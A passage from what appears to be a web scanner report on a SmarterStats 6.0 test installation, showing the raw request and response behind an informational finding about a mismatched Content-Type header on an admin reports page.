       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||564|hiddenField|__VIEWSTATE|/wEPDwUJOTI0MTQ3MzQ1DxYGHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeBF9zR0ZnFgJmD2QWAgIBD2QWDAIDD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgEPDxYCHgRUZXh0BQlTZWFyY2guLi5kZAIEDxYCHgVzdHlsZQUNZGlzcGxheTpub25lO2QCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8FaBYCAgEPFgIfA2VkAggPFgIfBWhkAgsPZBYCAgMPZBYCAgEPZBYCZg9kFgICAQ8PFgIfAwUJMSBzaXRlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBR9jdGwwMF9NUEhfSHlwZXJHcmlkMXwxfDB8OXwyNXwwZAUUY3RsMDAkTVBIJEh5cGVyR3JpZDEPBS1UcnVlfFRydWV8fEZhbHNlfEZhbHNlfG5hbWUgYXNjfEZhbHNlfEZhbHNlfDBkJMUqi4uoEethdHSZm63f3B4wJqE7AWufwFHKgl0cT/U=|42|asyncPostBackControlIDs||ctl00$BPH$btnDelete,,ctl00$BPH$btnRefresh,|0|postBackControlIDs|||150|updatePanelIDs||tctl00$BPH$UpdatePanel4,,tctl00$BrPH$UpdatePanel5,,tctl00$UpdatePanel1,,tctl00$MPH$UpdatePanel1,,tctl00$NavPH$UpdatePanel2,,tctl00$CntPH$UpdatePanel3,|0|childUpdatePanelIDs|||144|panelsToRefreshIDs||ctl00$BPH$UpdatePanel4,,ctl00$BrPH$UpdatePanel5,,ctl00$UpdatePanel1,,ctl00$MPH$UpdatePanel1,,ctl00$NavPH$UpdatePanel2,,ctl00$CntPH$UpdatePanel3,|2|asyncPostBackTimeout||90|13|formAction||frmSites.aspx|20|pageTitle||Sites - SmarterStats|224|scriptBlock|ScriptPath|/ScriptResource.axd?d=pVn15ziXvQY5aBffxiDTK6PUkVd1wbLwZ8qHXgDTDQU-gDmeOQZCbCnf3LN8cb6wKZJNHgRyjasDbTS9TuTZ7GXz6UL6zabFuTHuGM9izuBi-gzcVhEZX9Fg6cQx4oJc6iXtzA8ahWISPmTnWBlMNk0W7V9Kl_5HxQNbPSm8qmJcO3ou2wT9aun3Nb592DHA0&t=26c081|724|scriptBlock|ScriptContentWithTags|{"text":"\r\n var startup = function() {\r\n $(\"#FilterBarContents\").magicLabels();\r\n\r\n $(\"#ctl00_BrPH_searchBar_FilterBox\").keypress(function(event) {\r\n if (event.keyCode == 13) {\r\n __doPostBack(\u0027ctl00$BrPH$searchBar$btnGo\u0027,\u0027\u0027);\r\n event.preventDefault();\r\n }\r\n });\r\n\r\n $(\"#ctl00_BrPH_searchBar_btnClear\").click(function() {\r\n $(\"#ctl00_BrPH_searchBar_FilterBox\").val(\u0027\u0027);\r\n $(\"#FilterBarContents\").magicLabels();\r\n });\r\n }\r\n setTimeout(startup, 1);\r\n\t","type":"text/javascript"}|198|scriptStartupBlock|ScriptContentNoTags|
function ShowContextMenu_ctl00_MPH_ctl01(evt) {
   $('#ctl00_MPH_ctl01').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}
|22|scriptStartupBlock|ScriptContentNoTags|SiteInfoCallback([1]);|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|37|scriptStartupBlock|ScriptContentNoTags|document.onkeypress = DetectSearch;
|725|scriptStartupBlock|ScriptContentNoTags|var ctl00_MPH_HyperGrid1_Url14 = new Array();
ctl00_MPH_HyperGrid1_Url14[0] = 'frmSite\x2easpx\x3fSiteId\x3d1';
var ctl00_MPH_HyperGrid1;
function DelayedSetupctl00_MPH_HyperGrid1() {
   ctl00_MPH_HyperGrid1 = new HyperGrid('ctl00_MPH_HyperGrid1', true, '', 'Url14', '', null, -1, ShowContextMenu_ctl00_MPH_ctl01, OpenSite, null, false, 2, '\x7b0\x7d\x20selected\x20items',false, '', {});
   ctl00_MPH_HyperGrid1.AddUrlColumn('Url14',ctl00_MPH_HyperGrid1_Url14);
   ctl00_MPH_HyperGrid1.AutoSelect();
   
}
if (self.ctl00_MPH_HyperGrid1HGIsCallback)
   DelayedSetupctl00_MPH_HyperGrid1();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_HyperGrid1, 100);});
self.ctl00_MPH_HyperGrid1HGIsCallback = true;
|683|scriptStartupBlock|ScriptContentNoTags|function DoEdit_ctl00_BPH_btnEdit() {
   if(self.ctl00_MPH_HyperGrid1 == null || !self.ctl00_MPH_HyperGrid1.InitializeGrid) return ShowAlertWindow('No item has been selected');
   if (ctl00_MPH_HyperGrid1.GetUrlForSelectedRow == null) return;
   var url = ctl00_MPH_HyperGrid1.GetUrlForSelectedRow();
   if (url != null) { var grid = ctl00_MPH_HyperGrid1; var row = grid.GetSelectedRows()[0]; if (grid.GetVisibleRowByUid) row = grid.GetVisibleRowByUid(row); grid.DoDoubleClick(grid, row); }
   else {
       if (ctl00_MPH_HyperGrid1.GetSelectedRows().length == 0) ShowAlertWindow('No item has been selected');
       else ShowAlertWindow('You cannot edit multiple items at once.');
   }
}
|423|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_BPH_menuAction').hyperMenu({"ClearFloat":false,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_BPH_menuAction_btnViewStats":"return false;","ctl00_BPH_menuAction_btnViewStats_btnImpersonateAdmin":"Impersonate(false);","ctl00_BPH_menuAction_btnViewStats_btnImpersonateUser":"Impersonate(true);"},"ClientCallbacks":{}}); });
|

10.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmViewReports.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmViewReports.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Admin/frmViewReports.aspx?Custom=False&ReportType=ReportItem&subReportName=ADMIN_Traffic_Summary HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmViewReports.aspx?Custom=False&ReportType=ReportItem&subReportName=ADMIN_Traffic_Summary
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminReports"}
Content-Length: 6950

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24MPH%24btnShowReport&ctl00%24MPH%24RadStartDate=2010-10-13&ctl00_MPH_RadStartDate_dateInput_text=10%2F13%2F2010&ctl00%24MPH%24RadStartDate%24dateInput=2010-10-13-00-00-00&ctl00_MPH_RadStartDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadStartDate_calendar_SD=%5B%5B2010%2C10%2C13%5D%5D&ctl00_MPH_RadStartDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C12%5D%5D&ctl00_MPH_RadStartDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24RadEndDate=2010-10-29&ctl00_MPH_RadEndDate_dateInput_text=10%2F29%2F2010&ctl00%24MPH%24RadEndDate%24dateInput=2010-10-29-00-00-00&ctl00_MPH_RadEndDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadEndDate_calendar_SD=%5B%5B2010%2C10%2C29%5D%5D&ctl00_MPH_RadEndDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C12%5D%5D&ctl00_MPH_RadEndDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_mnuTable_hm1_CB=on&ctl00_MPH_mnuChart_mnuChart_BAR_CB=on&ctl00_MPH_mnuValue1_hm1_CB=on&ctl00_MPH_mnuValue2_hm2_CB=on&ctl00_MPH_mnuSort_hm1_CB=on&ctl00_MPH_mnuServer_hm0_CB=on&__EVENTTARGET=ctl00%24MPH%24btnShowReport&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExNjEyNDk5NzAPFgYeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZR4PcmVwb3J0RGlzcGxheWVkZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgICAQ9kFgJmD2QWBgIBDw8WAh4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFEkVtYWlsUmVwb3J0UG9wdXAoKWRkAgMPDxYCHwMFE0V4cG9ydFJlcG9ydFBvcHVwKClkZAIFDw8WAh8DBRJQcmludFJlcG9ydFBvcHVwKClkZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBWhkAgcPZBYCZg9kFgICAQ8WAh8FaBYCAgEPFgIeBFRleHRlZAIIDxYCHwVoZAIJD2QWBgIDDw8WEB4MU2VsZWN0ZWREYXRlBgDAn7aAOM0IHgdNaW5EYXRlBgBAyvij6OAHHgdNYXhEYXRlBgAAaMEpXKEJHhxFbmFibGVFbWJlZGRlZEJhc2VTdHlsZXNoZWV0aB4TRW5hYmxlRW1iZWRkZWRTa2luc2geBFNraW4FDFNtYXJ0ZXJUb29scx4IQ3NzQ2xhc3MFEkRhdGVQaWNrZXJPdmVycmlkZR4EXyFTQgICZBYGZg8UKwAIDxYSHwtoHg1PcmlnaW5hbFZhbHVlBRUxMC82LzIwMTAgMTI6MDA6MDAgQU0fCQYAAGjBKVyhCR4NTGFiZWxDc3NDbGFzcwUHcmlMYWJlbB4XRW5hYmxlQWpheFNraW5SZW5kZXJpbmdoHwwFDFNtYXJ0ZXJUb29scx8KaB8IBgBAyvij6OAHHwYFEzIwMTAtMTAtMTMtMDAtMDAtMDBkFgYeBVdpZHRoGwAAAAAAAFlABwAAAB8NBRFyaVRleHRCb3ggcmlIb3Zlch8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRXJyb3IfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FE3JpVGV4dEJveCByaUZvY3VzZWQfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FE3JpVGV4dEJveCByaUVuYWJsZWQfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FFHJpVGV4dEJveCByaURpc2FibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRFyaVRleHRCb3ggcmlFbXB0eR8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQUQcmlUZXh0Qm94IHJpUmVhZB8OAoICZAIBDw8WBB4ISW1hZ2VVcmwFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmHg1Ib3ZlckltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHgdvbmNsaWNrBTxyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZFN0YXJ0RGF0ZScpLCdjYWwnKTtkAgIPFCsADQ8WHAUPUmVuZGVySW52aXNpYmxlZwURRW5hYmxlTXVsdGlTZWxlY3RoBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWluRAYAQMr4o%2BjgBwUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAEGAMCftoA4zQgFBEZvY0QGAAA2jLc3zQgFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUETWF4RAYAAGjBKVyhCQ8WCB8MBQxTbWFydGVyVG9vbHMfC2gfCmgfEWhkZBYEHw0FC3JjTWFpblRhYmxlHw4CAhYEHw0FDHJjT3RoZXJNb250aB8OAgJkFgQfDQUKcmNTZWxlY3RlZB8OAgJkFgQfDQUKcmNEaXNhYmxlZB8OAgIWBB8NBQxyY091dE9mUmFuZ2UfDgICFgQfDQUJcmNXZWVrZW5kHw4CAhYEHw0FB3JjSG92ZXIfDgICFgQfDQU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHw4CAhYEHw0FCXJjVmlld1NlbB8OAgJkAgcPDxYQHwcGAMA7XRNFzQgfCAYAQMr4o%2BjgBx8JBgAAaMEpXKEJHwpoHwtoHwwFDFNtYXJ0ZXJUb29scx8NBRJEYXRlUGlja2VyT3ZlcnJpZGUfDgICZBYGZg8UKwAIDxYSHwtoHw8FFjEwLzEyLzIwMTAgMTI6MDA6MDAgQU0fCQYAAGjBKVyhCR8QBQdyaUxhYmVsHxFoHwwFDFNtYXJ0ZXJUb29scx8KaB8IBgBAyvij6OAHHwYFEzIwMTAtMTAtMjktMDAtMDAtMDBkFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQfEwUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYfFAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh8VBTpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZEVuZERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhwFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK%2BKPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwABBgDAO10TRc0IBQRGb2NEBgAANoy3N80IBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQNFUlNoBRJOYXZpZ2F0aW9uUHJldlRleHRlBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAITDxYCHwVoZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBgUWY3RsMDAkTVBIJFJhZFN0YXJ0RGF0ZQUfY3RsMDAkTVBIJFJhZFN0YXJ0RGF0ZSRjYWxlbmRhcgUfY3RsMDAkTVBIJFJhZFN0YXJ0RGF0ZSRjYWxlbmRhcgUUY3RsMDAkTVBIJFJhZEVuZERhdGUFHWN0bDAwJE1QSCRSYWRFbmREYXRlJGNhbGVuZGFyBR1jdGwwMCRNUEgkUmFkRW5kRGF0ZSRjYWxlbmRhcrDtRIMixWRxu5uOEBNfUyZm0c7ft24f7qaegzfzx9gP&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:19:40 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 8596

1|#||4|620|updatePanel|ctl00_BPH_UpdatePanel2|
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       |11|updatePanel|ctl00_UpdatePanel1|
               
           |1925|updatePanel|ctl00_MPH_UP1|
           <div class="Report"><div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Traffic Summary</td><td class="ReportSubTitle">(Server)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/13/2010 to 10/29/2010</td></tr><tr><td class="ReportItemOptionLabel">Server:<td><td>All</td></tr></table></div></div><div class="Report" id="ADMIN_Traffic_Summary"> <div class='ReportChart'><img src="/Temp/64f2a244700744ef8e68498f4cef8964.png" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Server Name</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>localhost</td>

<td class='ar percentcol '>
<div class='percent percent-2147483648'></div>
0</td>
<td class='ar percentcol '>
<div class='percent percent-2147483648'></div>
0</td>
<td class='ar percentcol '>
<div class='percent percent-2147483648'></div>
0</td>
<td class='ar percentcol rc'>
<div class='percent percent-2147483648'></div>
0</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal rank lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar '>0</td>
<td class='FooterTotal ar '>0</td>
<td class='FooterTotal ar '>0</td>
<td class='FooterTotal ar rc'>0</td>
</tr>
<tr class=''>
<td class='FooterAverages rank lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar '>0</td>
<td class='FooterAverages ar '>0</td>
<td class='FooterAverages ar '>0</td>
<td class='FooterAverages ar rc'>0</td>
</tr>
</tfoot>
</table></div>
</div>
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||5276|hiddenField|__VIEWSTATE|/wEPDwULLTExNjEyNDk5NzAPFgYeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZR4PcmVwb3J0RGlzcGxheWVkZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgICAQ9kFgJmD2QWBgIBDw8WAh4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFEkVtYWlsUmVwb3J0UG9wdXAoKWRkAgMPDxYCHwMFE0V4cG9ydFJlcG9ydFBvcHVwKClkZAIFDw8WAh8DBRJQcmludFJlcG9ydFBvcHVwKClkZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBWhkAgcPZBYCZg9kFgICAQ8WAh8FaBYCAgEPFgIeBFRleHRlZAIIDxYCHwVoZAIJD2QWBgIDDw8WEB4MU2VsZWN0ZWREYXRlBgDAn7aAOM0IHgdNaW5EYXRlBgBAyvij6OAHHgdNYXhEYXRlBgAAaMEpXKEJHhxFbmFibGVFbWJlZGRlZEJhc2VTdHlsZXNoZWV0aB4TRW5hYmxlRW1iZWRkZWRTa2luc2geBFNraW4FDFNtYXJ0ZXJUb29scx4IQ3NzQ2xhc3MFEkRhdGVQaWNrZXJPdmVycmlkZR4EXyFTQgICZBYGZg8UKwAIDxYSHwtoHg1PcmlnaW5hbFZhbHVlBRUxMC82LzIwMTAgMTI6MDA6MDAgQU0fCQYAAGjBKVyhCR4NTGFiZWxDc3NDbGFzcwUHcmlMYWJlbB4XRW5hYmxlQWpheFNraW5SZW5kZXJpbmdoHwwFDFNtYXJ0ZXJUb29scx8KaB8IBgBAyvij6OAHHwYFEzIwMTAtMTAtMTMtMDAtMDAtMDBkFgYeBVdpZHRoGwAAAAAAAFlABwAAAB8NBRFyaVRleHRCb3ggcmlIb3Zlch8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRXJyb3IfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FE3JpVGV4dEJveCByaUZvY3VzZWQfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FE3JpVGV4dEJveCByaUVuYWJsZWQfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FFHJpVGV4dEJveCByaURpc2FibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRFyaVRleHRCb3ggcmlFbXB0eR8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQUQcmlUZXh0Qm94IHJpUmVhZB8OAoICZAIBDw8WBB4ISW1hZ2VVcmwFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmHg1Ib3ZlckltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHgdvbmNsaWNrBTxyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZFN0YXJ0RGF0ZScpLCdjYWwnKTtkAgIPFCsADQ8WHAUPUmVuZGVySW52aXNpYmxlZwURRW5hYmxlTXVsdGlTZWxlY3RoBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWluRAYAQMr4o+jgBwUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAEGAMCftoA4zQgFBEZvY0QGAAA2jLc3zQgFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUETWF4RAYAAGjBKVyhCQ8WCB8MBQxTbWFydGVyVG9vbHMfC2gfCmgfEWhkZBYEHw0FC3JjTWFpblRhYmxlHw4CAhYEHw0FDHJjT3RoZXJNb250aB8OAgJkFgQfDQUKcmNTZWxlY3RlZB8OAgJkFgQfDQUKcmNEaXNhYmxlZB8OAgIWBB8NBQxyY091dE9mUmFuZ2UfDgICFgQfDQUJcmNXZWVrZW5kHw4CAhYEHw0FB3JjSG92ZXIfDgICFgQfDQU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHw4CAhYEHw0FCXJjVmlld1NlbB8OAgJkAgcPDxYQHwcGAMA7XRNFzQgfCAYAQMr4o+jgBx8JBgAAaMEpXKEJHwpoHwtoHwwFDFNtYXJ0ZXJUb29scx8NBRJEYXRlUGlja2VyT3ZlcnJpZGUfDgICZBYGZg8UKwAIDxYSHwtoHw8FFjEwLzEyLzIwMTAgMTI6MDA6MDAgQU0fCQYAAGjBKVyhCR8QBQdyaUxhYmVsHxFoHwwFDFNtYXJ0ZXJUb29scx8KaB8IBgBAyvij6OAHHwYFEzIwMTAtMTAtMjktMDAtMDAtMDBkFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQfEwUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYfFAUyL0FwcF9U